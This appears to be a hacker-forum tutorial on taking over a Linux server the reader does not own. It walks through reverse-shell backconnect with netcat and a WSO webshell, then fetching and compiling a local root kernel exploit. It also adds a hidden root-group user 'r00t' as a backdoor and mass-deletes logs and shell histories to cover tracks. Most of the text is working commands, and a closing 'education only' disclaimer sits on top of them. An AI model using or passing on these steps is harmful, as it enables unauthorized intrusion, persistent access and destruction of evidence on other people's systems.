Server Rooting Tutorial

Bài liên quan

Hello guys, hope you all are doing great! today i will explain how to root a Linux server with a localroot.

What is rooting?

Rooting is the process of exploiting the kernel to gain administrator(root) rights on servers.

Requirements:

Basic Unix/Linux Command Knowledge

Shell Acess On Targeted Server

PHP WebShell With Backconnect Option (Click Here to Download WSO 2.5 webshell)

A Localroot Exploit (Click Here to download localroot collection)

Netcat (Click Here to download)

Lets Get Started.... 


[#] Backconnecting

First of all you will need an open port on your router inorder to backconnect. Information on port forwarding can be found HERE
Open your command prompt/terminal cd to the netcat path and type:

nc -vlp 1337

where 1337 is the open port on your router. And it should be saying:

listening on [any] 1337 ...

Now go to your webshell and navigate to "BackConnect Option". The backconnect option is located under Network in the provided WSO webshell. 
Enter your port and click "Connect". 
Now go back to command prompt if you see something like:

sh: no job control in this shell

It means we have sucessfully backconnected to the server. Now lets start rooting the box

[#] Choosing Localroot Exploit

We will need a localroot exactly matching the kernel and year its build. The older the kernel the better the chances of finding an exploit and rooting it. To check which version of kernel its using Execute the following:

uname -rv

it will give you something like:

2.6.18-348.12.1.el5PAE #1 SMP Wed Jan 01 06:17:31 EDT 2013 i686 i686 i386 GNU/Linux

Now choose a localroot matching the kernel and year from the localroot collection which i provided or if you cant find it in the collection just google the kernel version and find an exploit.

[#] Executing Localroot Exploit

Upload the localroot via webshell or if you have it uploaded somewhere you can use the following command to download it to the server.

wget http://www.site.com/localroot.c

Now If your exploit is with a .c extension you will have to compile it. otherwise just skip to next step. For compiling:

gcc filename.c -o outputfilename

If you get permission denied error compile it locally or in other box and upload it to server. 
Giving full permission to the file:

chmod 0777 filename

Finally executing the exploit:

./filename

Now to check if you have got root execute the following:

whoami

If its says root it means you have successfully rooted the server.

[#] Adding New User

The following command adds a new user on server named "r00t"

adduser -g 0 r00t -G wheel,sys,bin,daemon,adm,disk -d /r00t -s /bin/sh

Now give a password for the user r00t type:

passwd r00t

Enter a password, confirm it and it should be saying

passwd: all authentication tokens updated successfully.

Now you will be able to login via putty or any ssh client.

[#] Clearing Logs

Now time for clearing our logs execute the following:

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

Note:- Rooting a box you dont own is illegal this information is for education purpose only. 
Stay safe and gud luck!